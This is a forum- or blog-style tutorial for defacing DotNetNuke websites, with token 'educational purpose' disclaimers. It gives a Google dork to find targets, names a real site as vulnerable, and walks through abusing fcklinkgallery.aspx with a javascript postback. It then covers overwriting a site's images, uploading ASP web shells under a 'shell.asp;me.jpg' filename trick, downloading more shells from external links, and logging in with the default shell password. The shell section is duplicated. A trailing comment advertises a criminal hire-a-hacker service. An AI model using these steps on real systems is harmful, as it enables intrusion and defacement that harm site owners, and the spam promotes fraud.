Note:- Only for educational purposeUsing google DORK try to find the vulnerable website.
inurl:"/portals/0"
You can also modify this google dork according to your need & requirementI have found these 2 website vulnerable to this attack:http://www.hancocksigns.com/
Open the home page and check any image which is located in /portals/0/Check the location of the image. It should be located in /portals/0/
Know remember if theimage is directly in following format
OR
inurl:tabid/176/Default.aspx
N00bs can also try both of these websites for testing purpose.
For e.g. in case of
http://www.hancocksigns.com/.the image is located at location-
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is
hea2d.gif
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxHOW TO RUN ?
Step 1
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
Step 2
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see like this
Portals/0/xyz.jpg
Then just click on choose file and upload it….
But if it is other format like ours…our image is in following format
Portals/0/images/hea2d.gif
That mean the image is stored in image folders so just click on file location first and select images
And then put the script and then upload
Now remember if you want to change the image first name the image you want to upload with the uploaded image
For eg if I want to upload the image I will name it to hea2d.gif
And then upload it
Note:- we are doing this only for educational purpose…we don’t want to attack on any ones income source..so pls take the backup of the image you will be changing…so that after learning you can upload the original image back….thnks
Part II
Uploading the shell
In this part you will learn how to upload the shell so dat u can deface the site
Note:- only for educational purpose
All step are same till step 2..
Just download this shell n upload it
after uploading the shell. To open the shell open in this format
http://www.site.com/portals/0/jaguar.asp;me.jpg
you will see like this
For video TUT visit
http://www.youtube.com/watch?v=e9TZ-gXWLzINow comes the shell uploading partAll parts are the same...Just where you upload image upload the asp shell in shell.asp;me.jpg formatShell linkhttp://www.mediafire.com/?0t1jmjmgnw2So when the shell is uploaded your shell link will be something like thiswww.site.com/portals/o/shell.asp.me.jpgAnother fun part download the apsxsyp shel from herehttp://www.mediafire.com/?isjvjngsl9udu10Upload this shell using the shell we uploaded first.. Now this shell link will bewww.site.com/portal/o/shell.aspx
Default password for shell is admin
Part II
Uploading the shell
In this part you will learn how to upload the shell so dat u can deface the site
Note:- only for educational purpose
All step are same till step 2..
Just download this shell n upload it
after uploading the shell. To open the shell open in this format
http://www.site.com/portals/0/jaguar.asp;me.jpg
you will see like this
For video TUT visit
http://www.youtube.com/watch?v=e9TZ-gXWLzINow comes the shell uploading partAll parts are the same...Just where you upload image upload the asp shell in shell.asp;me.jpg formatShell linkhttp://www.mediafire.com/?0t1jmjmgnw2So when the shell is uploaded your shell link will be something like thiswww.site.com/portals/o/shell.asp.me.jpgAnother fun part download the apsxsyp shel from herehttp://www.mediafire.com/?isjvjngsl9udu10Upload this shell using the shell we uploaded first.. Now this shell link will bewww.site.com/portal/o/shell.aspx
Default password for shell is admin
1 comments:
This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:
-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change
Email: cybergoldenhacker at gmail dot com
Post a Comment